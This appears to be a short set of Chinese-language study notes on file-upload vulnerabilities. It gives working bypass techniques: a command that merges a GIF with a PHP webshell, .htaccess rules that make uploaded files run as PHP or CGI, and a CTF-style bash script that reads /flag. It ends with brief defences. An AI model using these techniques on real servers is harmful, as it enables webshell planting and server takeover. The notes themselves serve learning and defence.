使用上传功能时,没有对上传文件进行严格检测,导致***者上传可以执行的恶意脚本
上传webshell,被获取服务器权限
能否上传,能否找到路径,能否执行
任何上传点,数据库备份,编辑模板。
上传文件,找到上传路径,想办法执行脚本
copy 1.gif/b + shell1.php/a shell2.php
<FilesMatch "shell"> #shell为文件名
SetHandler application/x-httpd-php
</FilesMatch>
利用htaccess可以启动cgi,执行bash脚本,上传.htaccess和solve.sh文件
.htaccess
Options +ExecCGI
AddHandler cgi-script .sh
solve.sh
#!/bin/bash
echo "Content-Type: text/plain"
cat /flag
exit 0
对上传路径进行验证,对上传文件进行随机重命名,上传路径禁止执行权限。
原文:https://blog.51cto.com/14930083/2532530